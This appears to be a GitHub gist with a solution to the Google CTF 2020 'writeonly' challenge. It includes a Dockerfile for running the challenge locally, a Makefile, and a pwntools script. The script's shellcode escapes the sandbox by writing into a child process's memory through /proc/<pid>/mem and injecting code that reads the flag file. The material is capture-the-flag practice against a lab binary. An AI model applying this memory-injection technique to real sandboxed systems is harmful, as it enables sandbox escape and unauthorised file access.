Created
December 13, 2020 07:16
-
-
Save kitsook/797ebdce57cb4a5eb6f98bfeb949a150 to your computer and use it in GitHub Desktop.
Alt attempt on Google CTF 2020 writeonly
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
FROM ubuntu:20.04 | |
RUN apt-get update && apt-get upgrade -y && apt-get install -y socat | |
RUN set -e -x; \ | |
groupadd -g 1337 user; \ | |
useradd -g 1337 -u 1337 -m user | |
COPY attachments/chal /home/user/ | |
COPY flag /home/user/ | |
RUN set -e -x; \ | |
chown -R root:root /home/user; \ | |
chmod 555 /home/user; \ | |
chmod 555 /home/user/chal; \ | |
chmod 444 /home/user/flag | |
USER user | |
CMD cd /home/user && socat TCP-LISTEN:1337,reuseaddr,fork EXEC:./chal |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import remote | |
import pwnlib | |
import os | |
# automatically set the binary type | |
pwnlib.context.context.binary = 'src/chal' | |
# connect to the site and get child pid | |
r = remote('127.0.0.1', 1337) | |
r.recvuntil('[DEBUG] child pid: ') | |
child_pid = int(r.recvline()) | |
# this is the code to be injected into child. since the child can read files, cat the flag | |
injection = pwnlib.asm.asm(pwnlib.shellcraft.cat('/home/user/flag', 1) + pwnlib.shellcraft.crash()) | |
# assemble the code to be executed by parent. | |
# open child's memory for writing | |
payload = pwnlib.shellcraft.open("/proc/{}/mem".format(child_pid), os.O_WRONLY) | |
# get the file descriptor and seek. | |
# looking at the disassembled check_flag function, the infinite loop starts at <check_flag+0x8> | |
payload += pwnlib.shellcraft.mov('r12', 'rax') | |
payload += pwnlib.shellcraft.syscall('SYS_lseek', 'r12', pwnlib.context.context.binary.symbols['check_flag'] + 0x8, os.SEEK_SET) | |
# parent write to child's memory and inject our code | |
payload += pwnlib.shellcraft.pushstr(injection) | |
payload += pwnlib.shellcraft.write("r12", "rsp", len(injection)) | |
payload = pwnlib.asm.asm(payload + pwnlib.shellcraft.infloop()) | |
r.sendlineafter('shellcode length? ', str(len(payload))) | |
r.sendafter('bytes of shellcode. ', payload) | |
# print the output from child | |
while True: | |
print(r.recvline()) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
doit: | |
python doit.py | |
build: | |
docker build -t sandbox-writeonly . | |
start: | |
docker run --rm --name sandbox-writeonly -p 127.0.0.1:1337:1337 sandbox-writeonly | |
stop: | |
docker stop sandbox-writeonly | |
disass: | |
objdump --disassemble=check_flag src/chal |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment